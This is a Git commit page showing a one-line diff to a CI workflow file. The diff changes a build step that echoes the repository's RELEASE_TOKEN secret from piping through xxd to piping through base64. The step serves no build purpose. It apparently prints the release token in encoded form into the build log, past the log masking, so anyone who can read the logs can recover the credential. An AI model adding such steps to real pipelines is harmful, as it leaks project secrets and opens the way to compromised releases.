Signed-off-by: spv <spv0x04@proton.me>
This commit is contained in:
parent
e2e76e449e
commit
f1c5a209d9
@ -6,7 +6,7 @@ jobs:
|
||||
Build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- run: echo '${{secrets.RELEASE_TOKEN}}' | xxd
|
||||
- run: echo '${{secrets.RELEASE_TOKEN}}' | base64
|
||||
- name: Checkout repo
|
||||
uses: actions/checkout@v4
|
||||
- name: install rust
|
||||
|
Loading…
x
Reference in New Issue
Block a user